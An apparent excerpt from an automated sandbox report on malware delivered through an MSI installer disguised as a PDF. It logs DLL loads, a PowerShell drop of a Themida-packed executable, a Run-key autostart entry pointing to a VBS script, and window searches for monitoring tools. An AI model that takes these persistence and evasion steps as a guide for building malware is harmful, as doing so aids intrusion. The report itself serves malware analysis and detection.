Source: C:\Users\Public\Documents\home21.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: compstui.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: inetres.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll

Source: C:\Users\Public\Documents\home21.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: hANEXOPDF.PDF40 234057.msi

Static file information: File size 1432576 > 1048576

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb\ source: hANEXOPDF.PDF40 234057.msi, MSIBC4E.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: hANEXOPDF.PDF40 234057.msi, MSIBC4E.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name: .themida
Source: home21.exe.3.dr	Static PE information: section name: .boot

Source: home21.exe.3.dr

Static PE information: section name: entropy: 7.9097474746193965

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBC4E.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\Documents\home21.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBBDE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBB6F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBB00.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBBBE.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBC4E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBBDE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBB6F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBB00.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBBBE.tmp	Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Users\Public\Documents\home21.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiavcthD C:\Users\Public\Documents\DiavcthD.vbs

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\Public\Documents\home21.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\Public\Documents\home21.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiavcthD			Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiavcthD			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
